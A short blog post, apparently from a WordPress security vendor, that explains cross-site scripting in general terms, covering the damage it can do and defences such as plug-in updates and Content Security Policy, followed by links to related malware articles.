The most common vulnerability in WordPress is called Cross Site Scripting (XSS). We would like to explain about this vulnerability.


What is a cross-site scripting vulnerability?

Simply put, cross-site scripting is a vulnerability that allows an arbitrary JAVASCRIPT to be executed on a browser.

A JAVASCRIPT is a program that is executed on the user’s browser, not on the server, and controls the site’s movements, communicates behind the scenes to bring data, etc. However, writing files and accessing the user’s computer are heavily restricted Script.

Therefore, even if there is a cross-site scripting vulnerability, the data on the WordPress site’s server will not be tampered with.

What can a cross-site scripting vulnerability do?

If a user clicks on a link that contains malicious JavaScript code in cross-site scripting, an arbitrary JavaScript can be executed on your site.
In this case, users may suffer the following damage

Users will be directed to malicious site advertisements or fraudulent sites.

The user’s login information (information stored in the browser’s cookie) on your site is sent to the hacker.
(For this reason, XSS is especially important to be aware of on sites where users log in.)

The login information of the WordPress administrator is sent.
(However, this login information is encrypted, so it does not immediately leak the administrator’s login. Please refer to this article ).

XSS is used as a springboard for spam mail and DDOS attacks.
XSS does not have an email sending function, but it is possible to make a contact form on a WordPress site work with XSS.

(* XSS itself does not have an email sending function, but it is possible to make a contact form on a WordPress site work with XSS.

How to prevent cross-site scripting vulnerabilities?

The following measures are effective in preventing the use of cross-site scripting vulnerabilities.

Update plug-ins and other software to eliminate the vulnerability.

Set up a Javascript execution policy called Content Security Policy.
Reference What is Content Security Policy CSP? How to set it up in WordPress

For WordPress malware and vulnerability scanning, please refer to the following
Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal]
if you would like to use it.

Related Posts:

  1. What is Japanese SEO Spam, a type of WordPress malware?
    We will explain about Japanese SEO Spam, which is a malware that embeds fake Japanese product sites in WordPress....
  2. WordPress malware Redirect to fake login page
    Recently, there have been an increasing number of cases of malware that direct users to a new type of fake login page. We will explain this malware....
  3. Change WordPress database prefix to prevent SQL injection
    You can reduce the chances of a successful SQL injection by changing the prefix of your WordPress database. We will explain how to do this....
  4. Vulnerability in tagDiv Composer plugin bundled with WordPress Newspaper theme allows database rewriting
    A vulnerability in tagDiv Composer, a plugin included with the WordPress Newspaper theme, has been discovered that allows the database to be rewritten....
  5. WordPress malware Fake browser update page
    Recently there has been an increase in WordPress malware that displays a fake browser update page. We will explain this malware....
  6. How Hackers Discover Your WordPress Site Dork
    It is dangerous to run a WordPress site and think that it will not be targeted because of low traffic. We will explain why low traffic does not necessarily mean that your site will not be hacked....